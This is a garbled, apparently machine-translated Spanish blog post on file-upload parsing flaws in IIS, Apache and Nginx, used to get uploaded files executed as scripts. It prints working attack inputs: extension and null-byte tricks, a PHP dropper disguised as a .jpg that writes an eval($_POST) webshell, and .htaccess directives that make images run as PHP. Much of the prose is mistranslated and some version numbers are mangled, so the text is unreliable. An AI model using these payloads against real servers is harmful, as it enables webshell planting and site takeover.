Análisis de las lagunas de carga de vulnerabilidad

Others 2020-04-07 09:17:20 views: null

analizar el archivo vulnerabilidades: Un poco de archivo especial se IIS, Apache, Nginx interpretado como una vulnerabilidad de formato de archivo de script en algunos casos

iis5.x y 6,0 vulnerabilidades

1. Contenido vulnerabilidad de análisis: /xxx.asp/ma.jpg

  • Establecido bajo el nombre del sitio web para .asp, .asa carpeta, todos los archivos dentro del directorio serán tratados como archivo ASP se analiza y se ejecuta, si se puede controlar la trayectoria de la carga, que no es necesario jpg carga rebautizado después usted puede conseguir a la cáscara.
    2. Presentar la vulnerabilidad de análisis: 1.asp; .jpg
  • Subir tiempo, porque la cola es gif, cargados de manera exitosa, el tiempo de ejecución no está detrás de la aplicación del punto y coma, ya que es la ejecución asp (paquete de reformas etéreo)

La vulnerabilidad de análisis de Apache

  • Apache se analiza desde la derecha hacia la izquierda, si se deja continuar identificando no reconocido
  • Por ejemplo 1.php.owf.rar, Apache no reconocido peso de fibra y RAR, gran parte de este archivo se ejecuta como php
  • Cómo determinar si era sufijo legal: Subir una prueba 1.php.rar.jpg ... (saber la extensión de agregar) para probar la legalidad

IIS7.0 / 7,5 / nginx <8,03 deformidad vulnerabilidad de análisis

  • Sube un nombre para el contenido del archivo 1.jpg
<?PHP fputs(fopen('xxx.php','w'),'<?php eval($_POST[a])?>');?>
  • 1.jpg acceso / .php, en este directorio producirá una palabra de Troya xxx.php

nginx <8,03 nula vulnerabilidad de ejecución de código de bytes

  • Incrustado código php en la imagen
  • Efectuarán accediendo xxx.jpg% 00.php

vulnerabilidad al analizar el archivo .htaccess de Apache

Si la prueba se encuentran en el archivo .htaccess puede ser cargado y ejecutado, entonces llegó la oportunidad.
Crear un 1.txt escrito el siguiente código para abrir el Guardar como, Guardar como tipo a Todos los archivos

AddType  application/x-httpd-php    .jpg

o

<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

documentos de archivo .htaccess en el significado del código es para cargar el formato .jpg sufijo de archivo en formato php para analizar el archivo.

D1stiny
Publicado 13 artículos originales · ganado elogios 0 · Vistas 440
carta privada preocupaciones

Supongo que te gusta

Origin blog.csdn.net/m0_46230316/article/details/105301090
Recomendado
Clasificación
Diario
Más
2024-05-18(30)
2024-05-17(4)
2024-05-16(22)
2024-05-15(5)
2024-05-14(10)
2024-05-13(7)
2024-05-12(22)
2024-05-11(31)
2024-05-10(32)
2024-05-09(31)

Code World

© 2018 codetd.com